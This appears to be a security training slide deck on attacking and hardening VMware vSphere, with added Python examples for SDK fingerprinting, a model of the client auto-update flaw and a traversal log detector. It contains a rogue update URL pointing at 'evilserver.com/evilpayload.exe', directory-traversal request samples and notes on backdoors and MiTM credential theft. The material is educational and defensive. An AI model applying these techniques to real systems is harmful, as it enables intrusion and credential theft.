WELCOME!
Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+
Hacking Uncovered: VMware® Advanced VMware® SecurityThe Latest Threats and Tools
Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.
Cool Offer!
vSphere – Just Another Layer to Attack?
Recent Cases involving VMware
What are you in for? Hold On!
Pen Testing Methodology
GuestStealer
Tomcat Zero Day Directory Traversal
VASTO
Mitigation Techniques
3rd Party Mitigation Tools
VMware – 80% of the Market Share
Do the Tools used in Pen Testing work with virtualization?
Are there hacks being designed just for VMware?
What is this costing us?
What is Happening today?
The Need is Here!
• CyberCrime and CyberWar Predictions for 2011
• #2 – Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft.
Hakin9 – Issue 01/2011 (37)
What are the main security concerns associated with virtualization in general?
• Segregation of Duties
• Accounting/Logging
• New APIs
  • VMsafe
  • vStorage
  • vNetwork
• VMsafe Virtual Appliances
• Plug-Ins
• Shared Resources – can they be attacked?
  • Memory, CPU, Datastore
Time to Discuss
Virtualization – Just Another Layer to Attack
• vSphere Client
• APIs
• Plugins – VMware
  • Update Manager
  • Guided Consolidation
  • VMware Converter
  • Storage vMotion
• Plugins – 3rd Party
  • Backup Solutions (3rd Party – Veeam)
  • RDP (3rd Party – the RDP plug-in, by Juxtaposition)
  • Invoke Plugin
Management Interfaces
Web Service
• ESX and vCenter both use a Web Service
  • vCenter: on by default – Why?
  • ESX: disabled – Thank God
• Tomcat Web Service
  • How many holes have we found here? WOW
• Utilizes a Proxy
  • This is the same proxy used by hostd.
• VMware is using an old version of Tomcat that leaves the username and password in a world-readable file!
  • Fixed by a recent update for vCenter 4.1
Tomcat
VMCI
VMCI, the Virtual Machine Communication Interface, is an interface built into the virtual hardware of a VM.
• It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted endpoint.
• This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7.
http://pubs.vmware.com/vmci-sdk/VMCI_intro.html
Threats
• Perceived
• Known
Risks
• Probability
• Potential Impact
Time to Discuss
Secunia Historic Advisories
• ESX 4.x
• ESXi 4.x
• vCenter Server 4.x
nvd.nist.gov
• Over 40 Vulnerabilities for VMware Products
McAfee Threats – VMware
• ESX Server Heap Buffer Overflow
• vCenter Update Manager CSS
• vCenter Update Manager Directory Traversal
Some Vulnerabilities
Chained Exploit Example
130 Million Credit Cards Stolen – Gonzalez Indictment
• SQL Injection Attacks
• SQL Injection Strings
• Malware
• Rootkits
• Visiting the stores
• Disabling the logs
• Using Proxies
Little Known Fact: Occurred on VMware!!!!
This does not change, regardless of the environment being tested.
• Information Gathering
• Scanning
• Enumeration
• Penetration
  • Fail: Start Over or tell them great job
  • Succeed: Escalate Privileges, Steal Data or Leave proof of hack, Cover Tracks, Leave Backdoors
Methodology
• Google
• NMAP – Since v4.8
• Ettercap
• Cain and Abel
• Metasploit
• Claudio Criscione's VASTO – Virtualization ASsessment TOolkit
Tools….
Shodan – You have to be kidding me!
We have to find the systems first. Just like any other service, ESX has its own tells (the vmware-authd listener on TCP 902 and the SDK web service on 443 are the usual giveaways). NMAP will give you what you need. Let's see this in action!
Scanning for ESX
• Yes, you can create your own modules.
• We will take a look at VASTO – Virtualization ASsessment TOolkit by Claudio Criscione
Auxiliary Modules
• The purpose of Meterpreter scripts is to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit)
• Meterpreter is an effective tool for creating backdoors.
Meterpreter
How we understand Fake Certificate Injection to work.
ARP Cache Poisoning will allow us to perform a successful SSL crack!
The hacking tools create fake certificates. Two simultaneous SSL connections are established: one between the victim and the hacker, the other between the hacker and the real server. The forged certificate is not signed by a CA the client trusts, so the attack relies on the user clicking through the certificate warning, which is routine when the host itself presents only a self-signed certificate.
The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.
Diagram (VIC Client Login → hacker → ESX Server):
1. Client → hacker: SSL request
2. Hacker → client: SSL reply (fake certificate)
3. Hacker → server: SSL request
4. Server → hacker: SSL reply (real self-signed cert)
5. What looks like F&JLMDHGST*KU P)JDGH$FDSD@ on the wire is cleartext to the hacker, who can copy & alter it, or stop it.
Stealing the Password
DECISION TIME!
Password Revealed…
You are still vulnerable even if you use vCenter.
I can offer this: once the above password is stolen you can log in to the host as vpxuser with that password.
Screenshots
Presented at ShmooCon 2010
VULNERABLE VERSIONS
• Server
  • VMware Server 2.x < 2.0.2 build 203138 (Linux)
  • VMware Server 1.x < 1.0.10 build 203137 (Linux)
• ESX/ESXi
  • ESX 3.5 w/o ESX350-200901401-SG
  • ESX 3.0.3 w/o ESX303-200812406-BG
  • ESXi 3.5 w/o ESXe350-200901401-I-SG
• Thanks for the Virtual Machines!
GuestStealer
• How Large is your dictionary file?
Dictionary Attack
• Need to know exactly what is running?
Fingerprinting Tool
VASTO – Auxiliary Modules
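Added example for the "Scanning for ESX" and "Fingerprinting Tool" slides above; this is not code from the deck, from VASTO or from VMware. It shows the fingerprinting idea in working Python: the vSphere SDK answers an unauthenticated RetrieveServiceContent call with an "about" block, and its apiType field tells an ESX/ESXi host (hostd) apart from vCenter Server (vpxd). The request body and the element and apiType names are from the vSphere API; the two response documents are constructed for this example (the build numbers are invented), and the minimum-version gate is only a coarse check, since real exposure depends on the patch level carried in the build number.

```python
# Added example (not VASTO or VMware code): fingerprint a vSphere SDK endpoint
# from the "about" block returned by RetrieveServiceContent and classify it as
# an ESX/ESXi host or a vCenter Server.  Replies below are constructed.
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
VIM_NS = "urn:vim25"

# The request a fingerprinter POSTs to https://<target>/sdk (Content-Type: text/xml).
# No login is needed: the service content is readable before Login.
RETRIEVE_SERVICE_CONTENT_REQUEST = f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}">
 <soapenv:Body>
  <RetrieveServiceContent xmlns="{VIM_NS}">
   <_this type="ServiceInstance">ServiceInstance</_this>
  </RetrieveServiceContent>
 </soapenv:Body>
</soapenv:Envelope>"""

ABOUT_FIELDS = ("name", "fullName", "version", "build", "apiType", "apiVersion")


def make_response(name, version, build, api_type, api_version):
    """Build a constructed RetrieveServiceContentResponse (real ones carry more fields)."""
    return f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns="{VIM_NS}">
 <soapenv:Body>
  <RetrieveServiceContentResponse>
   <returnval>
    <about>
     <name>{name}</name>
     <fullName>{name} {version} build-{build}</fullName>
     <vendor>VMware, Inc.</vendor>
     <version>{version}</version>
     <build>{build}</build>
     <apiType>{api_type}</apiType>
     <apiVersion>{api_version}</apiVersion>
    </about>
   </returnval>
  </RetrieveServiceContentResponse>
 </soapenv:Body>
</soapenv:Envelope>"""


# Constructed samples: one ESX host and one vCenter Server (invented build numbers).
SAMPLE_ESX_RESPONSE = make_response("VMware ESX", "4.1.0", "12345", "HostAgent", "4.1")
SAMPLE_VC_RESPONSE = make_response("VMware vCenter Server", "4.0.0", "23456", "VirtualCenter", "4.0")


def parse_about(soap_xml):
    """Return the about fields as a dict; raise if this is not a vSphere SDK reply."""
    root = ET.fromstring(soap_xml)
    about = root.find(f".//{{{VIM_NS}}}about")
    if about is None:
        raise ValueError("no <about> element in reply: not a vSphere SDK endpoint?")
    return {f: (about.findtext(f"{{{VIM_NS}}}{f}") or "") for f in ABOUT_FIELDS}


def classify(about):
    """apiType is the reliable tell: hostd answers HostAgent, vpxd answers VirtualCenter."""
    api_type = about["apiType"]
    if api_type == "HostAgent":
        return "ESX/ESXi host"
    if api_type == "VirtualCenter":
        return "vCenter Server"
    return f"unknown apiType {api_type!r}"


def version_tuple(text):
    return tuple(int(n) for n in re.findall(r"\d+", text))


def older_than(about, minimum):
    """Coarse version gate only: the build number (patch level) decides real exposure."""
    return version_tuple(about["version"]) < version_tuple(minimum)


def fingerprint(soap_xml):
    about = parse_about(soap_xml)
    return f"{classify(about)}: {about['fullName']} (API {about['apiVersion']})"


if __name__ == "__main__":
    for reply in (SAMPLE_ESX_RESPONSE, SAMPLE_VC_RESPONSE):
        print(fingerprint(reply))
```

Against a live target the same function is fed the HTTP response body of the POST; a non-SDK listener on 443 (a plain web server, for instance) produces either a parse error or a reply with no about block, and parse_about raises so the host is not mislabelled as ESX.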
vSphere Client Communication
Auto Update Process (Client ↔ Server):
1. Client → Server: GET /client/clients.xml (AutoUpdate URL)
2. Client → Server: RetrieveServiceInstance; Server → Client: ServiceInstance
3. Client → Server: RetrieveServiceStatus; Server → Client: Status
4. Client → Server: Login
The Auto Update Process
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
The Evil Guy
• <patchVersion>10.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://evilserver.com/evilpayload.exe</downloadUrl>
VASTO VILurker
• Change the clients.xml file
• The package will run under the user's privilege! Administrator, anyone?
• Provide your nasty trojan package. Could be combined with other attacks.
• Create a fake web interface so you look legit!
• This can be done as MiTM or Rogue Server
• You will trigger a "certificate error"
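Added example for the Auto Update Process and VILurker slides above; it is not code from the deck, from VASTO or from VMware. It models the decision the vSphere Client makes after fetching /client/clients.xml, first as the slides describe it (a higher patchVersion means the client fetches whatever downloadUrl it was handed) and then hardened so that an installer is only fetched over HTTPS from the server the client is actually talking to. Both clients.xml documents are constructed; the ConfigRoot/clientConnection wrapper elements, the origin host name and the assumption that the "*" placeholder stands for the connected server are mine, the slides show only the three inner elements.

```python
# Added example (not VASTO or VMware code): the vSphere Client auto-update
# decision on /client/clients.xml, vulnerable version beside a hardened one.
# The XML wrapper elements, host names and version numbers are assumptions.
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

ORIGIN = "vcenter.example.local"     # assumed: the server the client connected to
EXPECTED_FILE = "VMware-viclient.exe"
FIELDS = ("patchVersion", "apiVersion", "downloadUrl")


def make_clients_xml(patch, api, url):
    """Constructed clients.xml; the wrapper elements are an assumption."""
    return (f'<ConfigRoot><clientConnection id="0000">'
            f'<patchVersion>{patch}</patchVersion><apiVersion>{api}</apiVersion>'
            f'<downloadUrl>{url}</downloadUrl></clientConnection></ConfigRoot>')


# What the real server sends (slide values, "*" = the server itself).
LEGIT_XML = make_clients_xml("3.0.0", "3.1.0", "https://*/client/VMware-viclient.exe")
# The Evil Guy slide: rogue server or MiTM points the client at another host.
EVIL_XML = make_clients_xml("10.0.0", "3.1.0", "https://evilserver.com/evilpayload.exe")
# A MiTM can also keep the host name and only swap the file.
SAME_HOST_EVIL_XML = make_clients_xml("10.0.0", "3.1.0", "https://*/client/evilpayload.exe")


def parse_clients_xml(text):
    # clients.xml is attacker-controlled on a rogue or MiTM'd server; stdlib
    # ElementTree is used for brevity, a real client should use a hardened parser.
    root = ET.fromstring(text)
    return {k: (root.findtext(f".//{k}") or "") for k in FIELDS}


def version_tuple(text):
    return tuple(int(n) for n in re.findall(r"\d+", text))


def update_url_vulnerable(text, installed, origin=ORIGIN):
    """Behaviour the slides describe: newer patchVersion, so download and run it."""
    cfg = parse_clients_xml(text)
    if version_tuple(cfg["patchVersion"]) <= version_tuple(installed):
        return None                       # already current, no update
    return cfg["downloadUrl"].replace("*", origin, 1)


def update_url_hardened(text, installed, origin=ORIGIN):
    """Same decision, but the installer may only come from the server we logged in to."""
    cfg = parse_clients_xml(text)
    if version_tuple(cfg["patchVersion"]) <= version_tuple(installed):
        return None
    url = cfg["downloadUrl"].replace("*", origin, 1)
    parts = urlparse(url)
    if parts.scheme != "https":
        return None                       # no plaintext download
    if parts.hostname != origin:
        return None                       # evilserver.com is not where we connected
    if not parts.path.endswith("/" + EXPECTED_FILE):
        return None                       # the file name is part of the contract too
    return url


if __name__ == "__main__":
    for label, doc in (("legit", LEGIT_XML), ("evil", EVIL_XML), ("same-host evil", SAME_HOST_EVIL_XML)):
        print(label, "vulnerable:", update_url_vulnerable(doc, "3.0.0"),
              "hardened:", update_url_hardened(doc, "3.0.0"))
```

The origin check closes the rogue-server case from the slide but not a full MiTM that also serves the download from the "right" host name behind a forged certificate; for that the client has to verify the server certificate instead of letting the user click through the "certificate error" the slide mentions, and verify the publisher signature on the downloaded executable before running it with the user's privileges.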
VASTO Autopwn
Autopwn – How easy can it get?
• Uses a flaw in the Tomcat Web Server
• Transfers the latest session file from vCenter using a Directory Traversal attack.
• Admin rights without knowing a username or password! (You inherit the rights of whoever owns the stolen session, typically an administrator.)
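Added example for the Autopwn slide above, written for the defender's side; it is not code from the deck or from VASTO. It is detection logic for the kind of directory-traversal request that lets an attacker read a file such as a session log out of the web server's tree, run over constructed access-log lines in the common log format that Tomcat's access-log valve writes. The IPs, timestamps and request paths are invented for the example and are not the path VASTO actually uses; the point is the decoding and normalisation, because a single URL-decode misses double-encoded and backslash variants.

```python
# Added example (not VASTO code): flag directory-traversal requests in web
# access logs.  Log lines below are constructed; paths are not VASTO's vector.
import re
from urllib.parse import unquote

# Constructed sample in common log format.  Line 2 is plain encoding, line 3 is
# double-encoded with backslashes, line 5 has ".." inside a name, not as a segment.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2011:10:01:02 +0000] "GET /client/clients.xml HTTP/1.1" 200 412
10.0.0.9 - - [12/Jan/2011:10:01:05 +0000] "GET /webapp/..%2F..%2F..%2Flogs/catalina.out HTTP/1.1" 200 51233
10.0.0.9 - - [12/Jan/2011:10:01:06 +0000] "GET /webapp/%252e%252e%255c%252e%252e%255cconf/tomcat-users.xml HTTP/1.1" 200 1024
10.0.0.7 - - [12/Jan/2011:10:02:11 +0000] "GET /sdk/vimService.wsdl HTTP/1.1" 200 7780
10.0.0.7 - - [12/Jan/2011:10:02:12 +0000] "GET /docs/..stuff/index.html HTTP/1.1" 404 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(s, max_rounds=3):
    """Undo URL-encoding until it stops changing: %252e -> %2e -> '.' (double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def traversal_verdict(target):
    """'escape' if the path climbs above the web root, 'dotdot' if it contains
    '..' segments that stay inside the root, None if clean."""
    path = fully_decode(target.split("?", 1)[0])   # query string cannot change the path
    path = path.replace("\\", "/")                  # servers on Windows accept backslashes
    depth, seen_dotdot = 0, False
    for seg in path.split("/"):
        if seg == "..":
            seen_dotdot = True
            depth -= 1
            if depth < 0:
                return "escape"
        elif seg not in ("", "."):
            depth += 1
    return "dotdot" if seen_dotdot else None


def scan_log(text):
    """Return one record per suspicious request; status 200 means the read likely succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                # malformed line: not this job's concern
        verdict = traversal_verdict(m["target"])
        if verdict:
            hits.append({"ip": m["ip"], "target": m["target"],
                         "status": int(m["status"]), "verdict": verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Overlong UTF-8 encodings of the dot (the %c0%ae family) are not normalised here and would need an extra decoding step; also note that traversal attempts answered with 404 are still reconnaissance worth alerting on, which is why the verdict is independent of the status code.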
Mitigating These Vulnerabilities
• VMware
  • vShield Zones
• 3rd Party
  • Altor
  • Reflex
  • CheckPoint
  • Astaro Security Gateway
  • Tripwire
  • Catbird
  • HyTrust
Mitigation Tools – Best of Breed
Trend Micro Deep Security
Trend Micro Deep Security provides advanced security for physical, virtual, and cloud servers and virtual desktops.
Modules
• Agentless Malware Detection for VMs
• Deep Packet Inspection
• Intrusion Detection and Prevention
• Web Application Protection
• Application Control
• Bidirectional Stateful Firewall
• Integrity Monitoring
• Log Inspection
Deep Security Architecture
In-depth Look – *Author's Picks
Catbird
Catbird TrustZones® is a policy-based security envelope for virtual infrastructures and the cloud. It enforces protection and measures compliance across virtual clusters and data centers.
The Catbird virtual security appliance performs several functions:
• Hypervisor auditing
• Virtual network IPS
• Network segmentation and access control
• Vulnerability management
• Multi-tenant security
• Reports to management console
• Catbird appliances collect data and enforce policies
• Appliances report events to management console
• Management console analyses events and correlates to compliance framework
Catbird – continuous compliance
1. Course Introduction and Methodology
2. Penetration Testing 101
3. Primer and Reaffirming our Knowledge
4. Security Architecture, vCPU, vMemory
5. Routing and the vNetwork
6. vStorage – Architecture and Security Implementations
7. Hardening the Virtual Machines
8. Hardening the Host
9. Hardening Virtual Center
10. Virtualizing your DMZ
11. 3rd Party Mitigation Tools
12. Putting it all Together
VMware Advanced Security
1. Course Intro & Methodology
2. Virtualization Overview
3. Planning & Installing ESX/ESXi 4
4. Using Tools to Administer a VMware Environment
5. Configuring Networking
6. Configuring Storage
7. vCenter Server 4 and Licensing
8. VM Creation and Configuration & Snapshots
9. Security and Permissions
10. Server and VM Monitoring
11. Advanced ESX and vCenter Management
12. Patching and Upgrading ESX/ESXi
13. Disaster Recovery and Backup
50 Hours of Training – 6.5 Classes in ONE
vSphere 4.1 Ultimate Bootcamp
Review
• Does vSphere really have some major issues?
• Recent Cases involving ESX
• Pen Testing Methodology
• Web Related issues
• VASTO
• Mitigation techniques
Questions?